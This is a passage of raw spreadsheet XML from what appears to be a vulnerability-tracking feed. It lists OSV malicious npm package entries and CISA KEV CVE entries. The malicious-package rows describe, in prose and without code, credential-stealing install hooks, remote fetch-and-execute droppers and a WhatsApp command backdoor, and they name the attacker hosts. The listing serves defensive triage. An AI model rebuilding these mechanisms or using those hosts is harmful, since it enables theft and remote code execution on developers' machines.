</t></is></c><c r="T1673" s="6" t="inlineStr"><is><t>https://osv.dev/vulnerability/MAL-2026-16050</t></is></c></row><row r="1674"><c r="A1674" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1674" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1674" s="5" t="inlineStr"><is><t>MAL-2026-16051</t></is></c><c r="D1674" s="5" t="inlineStr" /><c r="E1674" s="5" t="inlineStr" /><c r="F1674" s="5" t="inlineStr" /><c r="G1674" s="5" t="inlineStr" /><c r="H1674" s="5" t="inlineStr" /><c r="I1674" s="5" t="inlineStr" /><c r="J1674" s="5" t="inlineStr" /><c r="K1674" s="5" t="inlineStr" /><c r="L1674" s="5" t="inlineStr"><is><t>npm:@umschool/analytics</t></is></c><c r="M1674" s="5" t="inlineStr" /><c r="N1674" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1674" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1674" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1674" s="5" t="inlineStr" /><c r="R1674" s="5" t="inlineStr" /><c r="S1674" s="5" t="inlineStr"><is><t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (da14c2843514d3c9103335648bc81a8bce18fc173b27c2ab39ebe2c6c0abe028)
@umschool/analytics@999.0.4 targets the internal @umschool npm scope with an implausibly high version number to force resolution over any private package of the same name. Its postinstall.js runs on npm install and collects host identity (os.hostname, os.userInfo, process.cwd), reads /etc/hostname, /etc/hosts, /etc/resolv.conf, and /proc/version, filters process.env for credential-shaped keys matching a broad regex (token/secret/key/pass/aws/db/jwt/auth/etc.), and walks parent directories to read.env and config.* files. Each payload is base64-encoded and transmitted via three HTTPS GET beacons to akko.requestcatcher.com, with an additional hex-encoded DNS beacon of hostname+user to the same domain. A README/comment self-labeling the code as a 'HARMLESS PoC' does not change the observed behavior: credential-shaped environment variables, dotenv files, and internal network configuration leave the installer's build host to a third-party request-catcher.
</t></is></c><c r="T1674" s="6" t="inlineStr"><is><t>https://osv.dev/vulnerability/MAL-2026-16051</t></is></c></row><row r="1675"><c r="A1675" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1675" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1675" s="5" t="inlineStr"><is><t>MAL-2026-16052</t></is></c><c r="D1675" s="5" t="inlineStr" /><c r="E1675" s="5" t="inlineStr" /><c r="F1675" s="5" t="inlineStr" /><c r="G1675" s="5" t="inlineStr" /><c r="H1675" s="5" t="inlineStr" /><c r="I1675" s="5" t="inlineStr" /><c r="J1675" s="5" t="inlineStr" /><c r="K1675" s="5" t="inlineStr" /><c r="L1675" s="5" t="inlineStr"><is><t>npm:open-item-validator</t></is></c><c r="M1675" s="5" t="inlineStr" /><c r="N1675" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1675" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1675" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1675" s="5" t="inlineStr" /><c r="R1675" s="5" t="inlineStr" /><c r="S1675" s="5" t="inlineStr"><is><t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (7ba5b55d57f4938bf2494d369d14434bb80ba6f6c712c7f8d89ae773c27dc457)
On require(), index.js spawns a detached, unref'd background Node process (lib/check-items.js) that repeatedly HTTP-GETs a JSON payload from http://itemx.servegame.com:8888/api/x-realtime and executes the returned JavaScript via new Function('require','module', payload.code)(require, moduleObj). The daemon survives the parent process and re-polls the endpoint on a configured interval, so whoever controls that endpoint runs arbitrary Node code on the installer's host on library load and continuously thereafter. The fetch is over plain HTTP to a No-IP dynamic-DNS host (servegame.com) that does not match the publisher's declared homepage (game.spawnrealm.com); a bundled RSA signature check does not alter that the endpoint operator chooses what code runs. README framing as 'signed game code updates' is inconsistent with the shipped generic fetch-and-exec mechanism and the publisher/destination host mismatch.
</t></is></c><c r="T1675" s="6" t="inlineStr"><is><t>https://osv.dev/vulnerability/MAL-2026-16052</t></is></c></row><row r="1676"><c r="A1676" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1676" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1676" s="5" t="inlineStr"><is><t>MAL-2026-16056</t></is></c><c r="D1676" s="5" t="inlineStr" /><c r="E1676" s="5" t="inlineStr" /><c r="F1676" s="5" t="inlineStr" /><c r="G1676" s="5" t="inlineStr" /><c r="H1676" s="5" t="inlineStr" /><c r="I1676" s="5" t="inlineStr" /><c r="J1676" s="5" t="inlineStr" /><c r="K1676" s="5" t="inlineStr" /><c r="L1676" s="5" t="inlineStr"><is><t>npm:tailwind-aspect-styles</t></is></c><c r="M1676" s="5" t="inlineStr" /><c r="N1676" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1676" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1676" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1676" s="5" t="inlineStr" /><c r="R1676" s="5" t="inlineStr" /><c r="S1676" s="5" t="inlineStr"><is><t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (4d63fe1e50dc7d704732a5e92e95f320fcc3fac45c5a0a223ed278f316c2bb14)
The package's main module (src/index.js) performs an https.get to http://23.27.245.100/index.js over plain HTTP, writes the response to./inout.js in the consumer's working directory, and immediately require()s the written file. The fetch is unpinned, unauthenticated, and served from a bare IP over cleartext, so the operator of that endpoint controls arbitrary JavaScript executed in the Node process that loads this package. The package presents itself as the Tailwind aspect-ratio plugin, with a package.json repository field pointing to tailwindlabs/tailwindcss-aspect-ratio, while the dropper is appended after the legitimate-looking plugin export.
</t></is></c><c r="T1676" s="6" t="inlineStr"><is><t>https://osv.dev/vulnerability/MAL-2026-16056</t></is></c></row><row r="1677"><c r="A1677" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1677" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1677" s="5" t="inlineStr"><is><t>MAL-2026-16057</t></is></c><c r="D1677" s="5" t="inlineStr" /><c r="E1677" s="5" t="inlineStr" /><c r="F1677" s="5" t="inlineStr" /><c r="G1677" s="5" t="inlineStr" /><c r="H1677" s="5" t="inlineStr" /><c r="I1677" s="5" t="inlineStr" /><c r="J1677" s="5" t="inlineStr" /><c r="K1677" s="5" t="inlineStr" /><c r="L1677" s="5" t="inlineStr"><is><t>npm:toru-ultimate</t></is></c><c r="M1677" s="5" t="inlineStr" /><c r="N1677" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1677" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1677" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1677" s="5" t="inlineStr" /><c r="R1677" s="5" t="inlineStr" /><c r="S1677" s="5" t="inlineStr"><is><t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (e6ef8cb6f3ca866b67fa91f2e770c674ddb7d6b110fd671ba98669dc1220510f)
The package's loginViaAPI() function POSTs caller-supplied Facebook email, password, and 2FA Base32 secret to https://minhdong.site/api/v1/facebook/login_ios (a domain unrelated to Facebook, tied to the package's contributor). The response returns Facebook cookies/access_token which are then installed into the caller's session. The README documents login via appState cookies and does not disclose that email/password logins are proxied through minhdong.site. Additionally, package.json declares 'fca-unofficial' as 'github:VangBanLaNhat/fca-unofficial' — an unpinned mutable GitHub reference with no commit SHA. npm install fetches whatever bytes the branch HEAD returns, with no integrity check, and this module is require'd by the bundled E2EE client, so its code runs at import. Whoever controls that GitHub branch controls code delivered to every installer.
</t></is></c><c r="T1677" s="6" t="inlineStr"><is><t>https://osv.dev/vulnerability/MAL-2026-16057</t></is></c></row><row r="1678"><c r="A1678" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1678" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1678" s="5" t="inlineStr"><is><t>MAL-2026-16058</t></is></c><c r="D1678" s="5" t="inlineStr" /><c r="E1678" s="5" t="inlineStr" /><c r="F1678" s="5" t="inlineStr" /><c r="G1678" s="5" t="inlineStr" /><c r="H1678" s="5" t="inlineStr" /><c r="I1678" s="5" t="inlineStr" /><c r="J1678" s="5" t="inlineStr" /><c r="K1678" s="5" t="inlineStr" /><c r="L1678" s="5" t="inlineStr"><is><t>npm:vinzz-wcli</t></is></c><c r="M1678" s="5" t="inlineStr" /><c r="N1678" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1678" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1678" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1678" s="5" t="inlineStr" /><c r="R1678" s="5" t="inlineStr" /><c r="S1678" s="5" t="inlineStr"><is><t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (8dec0212466f7170f1e00ecbfe3f846cbf5d211917c3831a6ee162ca6d44ec10)
vinzz-wcli is a WhatsApp CLI whose main entry (index.js) sets `global.ownerr = "6285185667890@s.whatsapp.net"` and treats any incoming WhatsApp message from that JID as coming from an authorized owner. The `messages.upsert` handler routes messages from owners into `handleCommand`, which dispatches to plugins including `cmd` (which calls `child_process.exec` on the message text) and `eval` (which builds and runs an `AsyncFunction` from the message text). When an installer runs the CLI and pairs their own WhatsApp account, the hardcoded third-party number is silently added as an owner and can send arbitrary shell commands and JavaScript to be executed on the installer's host with the installer's privileges. The tarball also ships a second file, index2.js, which is not the declared main but contains the same hardcoded owner JID and the same messages.upsert -&gt; handleCommand dispatch, providing an equivalent execution path if that file is invoked directly.
</t></is></c><c r="T1678" s="6" t="inlineStr"><is><t>https://osv.dev/vulnerability/MAL-2026-16058</t></is></c></row><row r="1679"><c r="A1679" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1679" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1679" s="5" t="inlineStr"><is><t>MAL-2026-16199</t></is></c><c r="D1679" s="5" t="inlineStr" /><c r="E1679" s="5" t="inlineStr" /><c r="F1679" s="5" t="inlineStr" /><c r="G1679" s="5" t="inlineStr" /><c r="H1679" s="5" t="inlineStr" /><c r="I1679" s="5" t="inlineStr" /><c r="J1679" s="5" t="inlineStr" /><c r="K1679" s="5" t="inlineStr" /><c r="L1679" s="5" t="inlineStr"><is><t>npm:plogme</t></is></c><c r="M1679" s="5" t="inlineStr" /><c r="N1679" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1679" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1679" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q1679" s="5" t="inlineStr" /><c r="R1679" s="5" t="inlineStr" /><c r="S1679" s="5" t="inlineStr"><is><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is></c><c r="T1679" s="6" t="inlineStr"><is><t>https://osv.dev/vulnerability/MAL-2026-16199</t></is></c></row><row r="1680"><c r="A1680" s="5" t="inlineStr"><is><t>P1 - Act now</t></is></c><c r="B1680" s="5" t="inlineStr"><is><t>Added to KEV</t></is></c><c r="C1680" s="5" t="inlineStr"><is><t>CVE-2026-58704</t></is></c><c r="D1680" s="5" t="n"><v>8.800000000000001</v></c><c r="E1680" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1680" s="5" t="inlineStr"><is><t>CISA-ADP</t></is></c><c r="G1680" s="5" t="inlineStr"><is><t>Yes</t></is></c><c r="H1680" s="5" t="n"><v>0.001</v></c><c r="I1680" s="5" t="inlineStr"><is><t>active</t></is></c><c r="J1680" s="5" t="inlineStr" /><c r="K1680" s="5" t="inlineStr"><is><t>google:pixel</t></is></c><c r="L1680" s="5" t="inlineStr" /><c r="M1680" s="5" t="inlineStr" /><c r="N1680" s="5" t="inlineStr"><is><t>KEV, Vulnrichment</t></is></c><c r="O1680" s="5" t="inlineStr" /><c r="P1680" s="5" t="inlineStr" /><c r="Q1680" s="5" t="inlineStr"><is><t>2026-09-19</t></is></c><c r="R1680" s="5" t="inlineStr"><is><t>CWE-285, CWE-693</t></is></c><c r="S1680" s="5" t="inlineStr"><is><t>Google Pixel devices contain an improper authorization vulnerability in the cellular modem. A logic error may allow an attacker to bypass permission checks and escalate privileges.</t></is></c><c r="T1680" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-58704</t></is></c></row><row r="1681"><c r="A1681" s="5" t="inlineStr"><is><t>P1 - Act now</t></is></c><c r="B1681" s="5" t="inlineStr"><is><t>Added to KEV</t></is></c><c r="C1681" s="5" t="inlineStr"><is><t>CVE-2026-87491</t></is></c><c r="D1681" s="5" t="n"><v>8.800000000000001</v></c><c r="E1681" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1681" s="5" t="inlineStr"><is><t>CISA-ADP</t></is></c><c r="G1681" s="5" t="inlineStr"><is><t>Yes</t></is></c><c r="H1681" s="5" t="n"><v>0.01</v></c><c r="I1681" s="5" t="inlineStr"><is><t>active</t></is></c><c r="J1681" s="5" t="inlineStr" /><c r="K1681" s="5" t="inlineStr"><is><t>google:chromium v8</t></is></c><c r="L1681" s="5" t="inlineStr" /><c r="M1681" s="5" t="inlineStr" /><c r="N1681" s="5" t="inlineStr"><is><t>KEV, Vulnrichment</t></is></c><c r="O1681" s="5" t="inlineStr" /><c r="P1681" s="5" t="inlineStr" /><c r="Q1681" s="5" t="inlineStr"><is><t>2026-09-23</t></is></c><c r="R1681" s="5" t="inlineStr" /><c r="S1681" s="5" t="inlineStr"><is><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is></c><c r="T1681" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-87491</t></is></c></row><row r="1682"><c r="A1682" s="5" t="inlineStr"><is><t>P1 - Act now</t></is></c><c r="B1682" s="5" t="inlineStr"><is><t>Added to KEV</t></is></c><c r="C1682" s="5" t="inlineStr"><is><t>CVE-2025-25249</t></is></c><c r="D1682" s="5" t="inlineStr" /><c r="E1682" s="5" t="inlineStr" /><c r="F1682" s="5" t="inlineStr" /><c r="G1682" s="5" t="inlineStr"><is><t>Yes</t></is></c><c r="H1682" s="5" t="n"><v>0.024</v></c><c r="I1682" s="5" t="inlineStr"><is><t>active</t></is></c><c r="J1682" s="5" t="inlineStr"><is><t>fortinet</t></is></c><c r="K1682" s="5" t="inlineStr"><is><t>fortinet:multiple products</t></is></c><c r="L1682" s="5" t="inlineStr" /><c r="M1682" s="5" t="inlineStr" /><c r="N1682" s="5" t="inlineStr"><is><t>KEV, Vulnrichment</t></is></c><c r="O1682" s="5" t="inlineStr" /><c r="P1682" s="5" t="inlineStr" /><c r="Q1682" s="5" t="inlineStr"><is><t>2026-09-12</t></is></c><c r="R1682" s="5" t="inlineStr" /><c r="S1682" s="5" t="inlineStr"><is><t>Fortinet FortiOS, FortiSwitchManager, and FortiSASE contain a heap-based buffer overflow vulnerability that allows an attacker to execute unauthorized code or commands via specially crafted packets.</t></is></c><c r="T1682" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2025-25249</t></is></c></row><row r="1683"><c r="A1683" s="5" t="inlineStr"><is><t>P1 - Act now</t></is></c><c r="B1683" s="5" t="inlineStr"><is><t>Added to KEV</t></is></c><c r="C1683" s="5" t="inlineStr"><is><t>CVE-2026-19490</t></is></c><c r="D1683" s="5" t="inlineStr" /><c r="E1683" s="5" t="inlineStr" /><c r="F1683" s="5" t="inlineStr" /><c r="G1683" s="5" t="inlineStr"><is><t>Yes</t></is></c><c r="H1683" s="5" t="n"><v>0.056</v></c><c r="I1683" s="5" t="inlineStr"><is><t>active</t></is></c><c r="J1683" s="5" t="inlineStr"><is><t>citrix</t></is></c><c r="K1683" s="5" t="inlineStr"><is><t>citrix:netscaler</t></is></c><c r="L1683" s="5" t="inlineStr" /><c r="M1683" s="5" t="inlineStr" /><c r="N1683" s="5" t="inlineStr"><is><t>KEV, Vulnrichment</t></is></c><c r="O1683" s="5" t="inlineStr" /><c r="P1683" s="5" t="inlineStr" /><c r="Q1683" s="5" t="inlineStr"><is><t>2026-09-12</t></is></c><c r="R1683" s="5" t="inlineStr"><is><t>CWE-288</t></is></c><c r="S1683" s="5" t="inlineStr"><is><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is></c><c r="T1683" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-19490</t></is></c></row><row r="1684"><c r="A1684" s="5" t="inlineStr"><is><t>P1 - Act now</t></is></c><c r="B1684" s="5" t="inlineStr"><is><t>Added to KEV</t></is></c><c r="C1684" s="5" t="inlineStr"><is><t>CVE-2026-20079</t></is></c><c r="D1684" s="5" t="inlineStr" /><c r="E1684" s="5" t="inlineStr" /><c r="F1684" s="5" t="inlineStr" /><c r="G1684" s="5" t="inlineStr"><is><t>Yes</t></is></c><c r="H1684" s="5" t="n"><v>0.758</v></c><c r="I1684" s="5" t="inlineStr"><is><t>active</t></is></c><c r="J1684" s="5" t="inlineStr"><is><t>cisco</t></is></c><c r="K1684" s="5" t="inlineStr"><is><t>cisco:secure firewall management center (fmc) and security cloud control (scc) firewall management</t></is></c><c r="L1684" s="5" t="inlineStr" /><c r="M1684" s="5" t="inlineStr" /><c r="N1684" s="5" t="inlineStr"><is><t>KEV, Vulnrichment</t></is></c><c r="O1684" s="5" t="inlineStr" /><c r="P1684" s="5" t="inlineStr" /><c r="Q1684" s="5" t="inlineStr"><is><t>2026-09-12</t></is></c><c r="R1684" s="5" t="inlineStr" /><c r="S1684" s="5" t="inlineStr"><is><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is></c><c r="T1684" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-20079</t></is></c></row><row r="1685"><c r="A1685" s="5" t="inlineStr"><is><t>P1 - Act now</t></is></c><c r="B1685" s="5" t="inlineStr"><is><t>Added to KEV</t></is></c><c r="C1685" s="5" t="inlineStr"><is><t>CVE-2026-42016</t></is></c><c r="D1685" s="5" t="inlineStr" /><c r="E1685" s="5" t="inlineStr" /><c r="F1685" s="5" t="inlineStr" /><c r="G1685" s="5" t="inlineStr"><is><t>Yes</t></is></c><c r="H1685" s="5" t="n"><v>0.008999999999999999</v></c><c r="I1685" s="5" t="inlineStr"><is><t>active</t></is></c><c r="J1685" s="5" t="inlineStr" /><c r="K1685" s="5" t="inlineStr"><is><t>jfrog:artifactory</t></is></c><c r="L1685" s="5" t="inlineStr" /><c r="M1685" s="5" t="inlineStr" /><c r="N1685" s="5" t="inlineStr"><is><t>KEV, Vulnrichment</t></is></c><c r="O1685" s="5" t="inlineStr" /><c r="P1685" s="5" t="inlineStr" /><c r="Q1685" s="5" t="inlineStr"><is><t>2026-09-25</t></is></c><c r="R1685" s="5" t="inlineStr" /><c r="S1685" s="5" t="inlineStr"><is><t>JFrog Artifactory contains an incorrect authorization vulnerability that leads to a privilege escalation attack due to a validation check of the token signature/issuer and not the token’s scope.</t></is></c><c r="T1685" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-42016</t></is></c></row><row r="1686"><c r="A1686" s="5" t="inlineStr"><is><t>P1 - Act now</t></is></c><c r="B1686" s="5" t="inlineStr"><is><t>Added to KEV</t></is></c><c r="C1686" s="5" t="inlineStr"><is><t>CVE-2026-42018</t></is></c><c r="D1686" s="5" t="inlineStr" /><c r="E1686" s="5" t="inlineStr" /><c r="F1686" s="5" t="inlineStr" /><c r="G1686" s="5" t="inlineStr"><is><t>Yes</t></is></c><c r="H1686" s="5" t="n"><v>0.008999999999999999</v></c><c r="I1686" s="5" t="inlineStr"><is><t>none</t></is></c><c r="J1686" s="5" t="inlineStr" /><c r="K1686" s="5" t="inlineStr"><is><t>jfrog:artifactory</t></is></c><c r="L1686" s="5" t="inlineStr" /><c r="M1686" s="5" t="inlineStr" /><c r="N1686" s="5" t="inlineStr"><is><t>KEV, Vulnrichment</t></is></c><c r="O1686" s="5" t="inlineStr" /><c r="P1686" s="5" t="inlineStr" /><c r="Q1686" s="5" t="inlineStr"><is><t>2026-09-25</t></is></c><c r="R1686" s="5" t="inlineStr" /><c r="S1686" s="5" t="inlineStr"><is><t>JFrog Artifactory contains an improper authentication vulnerability that could return an internal anonymous-user token to an unauthenticated caller when anonymous access is disabled, potentially exposing sensitive resources.</t></is></c><c r="T1686" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-42018</t></is></c></row><row r="1687"><c r="A1687" s="5" t="inlineStr"><is><t>P1 - Act now</t></is></c><c r="B1687" s="5" t="inlineStr"><is><t>Added to KEV</t></is></c><c r="C1687" s="5" t="inlineStr"><is><t>CVE-2026-67277</t></is></c><c r="D1687" s="5" t="inlineStr" /><c r="E1687" s="5" t="inlineStr" /><c r="F1687" s="5" t="inlineStr" /><c r="G1687" s="5" t="inlineStr"><is><t>Yes</t></is></c><c r="H1687" s="5" t="n"><v>0.008999999999999999</v></c><c r="I1687" s="5" t="inlineStr"><is><t>active</t></is></c><c r="J1687" s="5" t="inlineStr" /><c r="K1687" s="5" t="inlineStr"><is><t>mikrotik:routeros</t></is></c><c r="L1687" s="5" t="inlineStr" /><c r="M1687" s="5" t="inlineStr" /><c r="N1687" s="5" t="inlineStr"><is><t>KEV, Vulnrichment</t></is></c><c r="O1687" s="5" t="inlineStr" /><c r="P1687" s="5" t="inlineStr" /><c r="Q1687" s="5" t="inlineStr"><is><t>2026-09-13</t></is></c><c r="R1687" s="5" t="inlineStr" /><c r="S1687" s="5" t="inlineStr"><is><t>MikroTik RouterOS contains a missing authentication for critical function vulnerability which allows kernel memory disclosure and denial of service in the btest service.</t></is></c><c r="T1687" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-67277</t></is></c></row><row r="1688"><c r="A1688" s="5" t="inlineStr"><is><t>P1 - Act now</t></is></c><c r="B1688" s="5" t="inlineStr"><is><t>Added to KEV</t></is></c><c r="C1688" s="5" t="inlineStr"><is><t>CVE-2026-75650</t></is></c><c r="D1688" s="5" t="inlineStr" /><c r="E1688" s="5" t="inlineStr" /><c r="F1688" s="5" t="inlineStr" /><c r="G1688" s="5" t="inlineStr"><is><t>Yes</t></is></c><c r="H1688" s="5" t="n"><v>0.021</v></c><c r="I1688" s="5" t="inlineStr"><is><t>active</t></is></c><c r="J1688" s="5" t="inlineStr" /><c r="K1688" s="5" t="inlineStr"><is><t>adobe:commerce and magento</t></is></c><c r="L1688" s="5" t="inlineStr" /><c r="M1688" s="5" t="inlineStr" /><c r="N1688" s="5" t="inlineStr"><is><t>KEV, Vulnrichment</t></is></c><c r="O1688" s="5" t="inlineStr" /><c r="P1688" s="5" t="inlineStr" /><c r="Q1688" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="R1688" s="5" t="inlineStr" /><c r="S1688" s="5" t="inlineStr"><is><t>Adobe Commerce and Magento Open Source contain an improper neutralization of special elements used in a template engine vulnerability that could allow an attacker to execute arbitrary code.</t></is></c><c r="T1688" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75650</t></is></c></row><row r="1689"><c r="A1689" s="5" t="inlineStr"><is><t>P1 - Act now</t></is></c><c r="B1689" s="5" t="inlineStr"><is><t>Added to KEV</t></is></c><c r="C1689" s="5" t="inlineStr"><is><t>CVE-2026-76460</t></is></c><c r="D1689" s="5" t="inlineStr" /><c r="E1689" s="5" t="inlineStr" /><c r="F1689" s="5" t="inlineStr" /><c r="G1689" s="5" t="inlineStr"><is><t>Yes</t></is></c><c r="H1689" s="5" t="inlineStr" /><c r="I1689" s="5" t="inlineStr"><is><t>active</t></is></c><c r="J1689" s="5" t="inlineStr"><is><t>cisco</t></is></c><c r="K1689" s="5" t="inlineStr"><is><t>cisco:identity services engine</t></is></c><c r="L1689" s="5" t="inlineStr" /><c r="M1689" s="5" t="inlineStr" /><c r="N1689" s="5" t="inlineStr"><is><t>KEV, Vulnrichment</t></is></c><c r="O1689" s="5" t="inlineStr" /><c r="P1689" s="5" t="inlineStr" /><c r="Q1689" s="5" t="inlineStr"><is><t>2026-09-19</t></is></c><c r="R1689" s="5" t="inlineStr" /><c r="S1689" s="5" t="inlineStr"><is><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is></c><c r="T1689" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-76460</t></is></c></row><row r="1690"><c r="A1690" s="5" t="inlineStr"><is><t>P1 - Act now</t></is></c><c r="B1690" s="5" t="inlineStr"><is><t>Added to KEV</t></is></c><c r="C1690" s="5" t="inlineStr"><is><t>CVE-2026-76461</t></is></c><c r="D1690" s="5" t="inlineStr" /><c r="E1690" s="5" t="inlineStr" /><c r="F1690" s="5" t="inlineStr" /><c r="G1690" s="5" t="inlineStr"><is><t>Yes</t></is></c><c r="H1690" s="5" t="n"><v>0.02</v></c><c r="I1690" s="5" t="inlineStr"><is><t>active</t></is></c><c r="J1690" s="5" t="inlineStr"><is><t>cisco</t></is></c><c r="K1690" s="5" t="inlineStr"><is><t>cisco:secure email gateway</t></is></c><c r="L1690" s="5" t="inlineStr" /><c r="M1690" s="5" t="inlineStr" /><c r="N1690" s="5" t="inlineStr"><is><t>KEV, Vulnrichment</t></is></c><c r="O1690" s="5" t="inlineStr" /><c r="P1690" s="5" t="inlineStr" /><c r="Q1690" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="R1690" s="5" t="inlineStr" /><c r="S1690" s="5" t="inlineStr"><is><t>Cisco AsyncOS software for Cisco Secure Email Gateway (SEG) contains a SQL injection vulnerability that could allow an unauthenticated, remote attacker to execute arbitrary commands with root privileges on the underlying operating system.</t></is></c><c r="T1690" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-76461</t></is></c></row><row r="1691"><c r="A1691" s="5" t="inlineStr"><is><t>P1 - Act now</t></is></c><c r="B1691" s="5" t="inlineStr"><is><t>Added to KEV</t></is></c><c r="C1691" s="5" t="inlineStr"><is><t>CVE-2026-85706</t></is></c><c r="D1691" s="5" t="inlineStr" /><c r="E1691" s="5" t="inlineStr" /><c r="F1691" s="5" t="inlineStr" /><c r="G1691" s="5" t="inlineStr"><is><t>Yes</t></is></c><c r="H1691" s="5" t="n"><v>0.12</v></c><c r="I1691" s="5" t="inlineStr"><is><t>active</t></is></c><c r="J1691" s="5" t="inlineStr"><is><t>gitlab</t></is></c><c r="K1691" s="5" t="inlineStr"><is><t>gitlab:community edition and enterprise edition</t></is></c><c r="L1691" s="5" t="inlineStr" /><c r="M1691" s="5" t="inlineStr" /><c r="N1691" s="5" t="inlineStr"><is><t>KEV, Vulnrichment</t></is></c><c r="O1691" s="5" t="inlineStr" /><c r="P1691" s="5" t="inlineStr" /><c r="Q1691" s="5" t="inlineStr"><is><t>2026-09-14</t></is></c><c r="R1691" s="5" t="inlineStr" /><c r="S1691" s="5" t="inlineStr"><is><t>GitLab Community Edition and Enterprise Edition contains a path traversal vulnerability that allows an unauthenticated user to read arbitrary files due to an improper path confinement and missing authentication enforcement in the repository commits API.</t></is></c><c r="T1691" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-85706</t></is></c></row><row r="1692"><c r="A1692" s="5" t="inlineStr"><is><t>P1 - Act now</t></is></c><c r="B1692" s="5" t="inlineStr"><is><t>Added to KEV</t></is></c><c r="C1692" s="5" t="inlineStr"><is><t>CVE-2026-86060</t></is></c><c r="D1692" s="5" t="inlineStr" /><c r="E1692" s="5" t="inlineStr" /><c r="F1692" s="5" t="inlineStr" /><c r="G1692" s="5" t="inlineStr"><is><t>Yes</t></is></c><c r="H1692" s="5" t="n"><v>0.011</v></c><c r="I1692" s="5" t="inlineStr"><is><t>active</t></is></c><c r="J1692" s="5" t="inlineStr" /><c r="K1692" s="5" t="inlineStr"><is><t>mikrotik:routeros</t></is></c><c r="L1692" s="5" t="inlineStr" /><c r="M1692" s="5" t="inlineStr" /><c r="N1692" s="5" t="inlineStr"><is><t>KEV, Vulnrichment</t></is></c><c r="O1692" s="5" t="inlineStr" /><c r="P1692" s="5" t="inlineStr" /><c r="Q1692" s="5" t="inlineStr"><is><t>2026-09-13</t></is></c><c r="R1692" s="5" t="inlineStr" /><c r="S1692" s="5" t="inlineStr"><is><t>MikroTik RouterOS contains an improper neutralization of argument delimiters in a command vulnerability which allows an attacker to change the trusted RouterOS policy mask, leading to privilege escalation.</t></is></c><c r="T1692" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86060</t></is></c></row><row r="1693"><c r="A1693" s="5" t="inlineStr"><is><t>P1 - Act now</t></is></c><c r="B1693" s="5" t="inlineStr"><is><t>Added to KEV</t></is></c><c r="C1693" s="5" t="inlineStr"><is><t>CVE-2026-86218</t></is></c><c r="D1693" s="5" t="inlineStr" /><c r="E1693" s="5" t="inlineStr" /><c r="F1693" s="5" t="inlineStr" /><c r="G1693" s="5" t="inlineStr"><is><t>Yes</t></is></c><c r="H1693" s="5" t="n"><v>0.007</v></c><c r="I1693" s="5" t="inlineStr"><is><t>active</t></is></c><c r="J1693" s="5" t="inlineStr" /><c r="K1693" s="5" t="inlineStr"><is><t>n-able:n-central</t></is></c><c r="L1693" s="5" t="inlineStr" /><c r="M1693" s="5" t="inlineStr" /><c r="N1693" s="5" t="inlineStr"><is><t>KEV, Vulnrichment</t></is></c><c r="O1693" s="5" t="inlineStr" /><c r="P1693" s="5" t="inlineStr" /><c r="Q1693" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="R1693" s="5" t="inlineStr" /><c r="S1693" s="5" t="inlineStr"><is><t>N-able N-central contains a static code injection vulnerability that could allow for pre-authentication remote code execution.</t></is></c><c r="T1693" s="6" 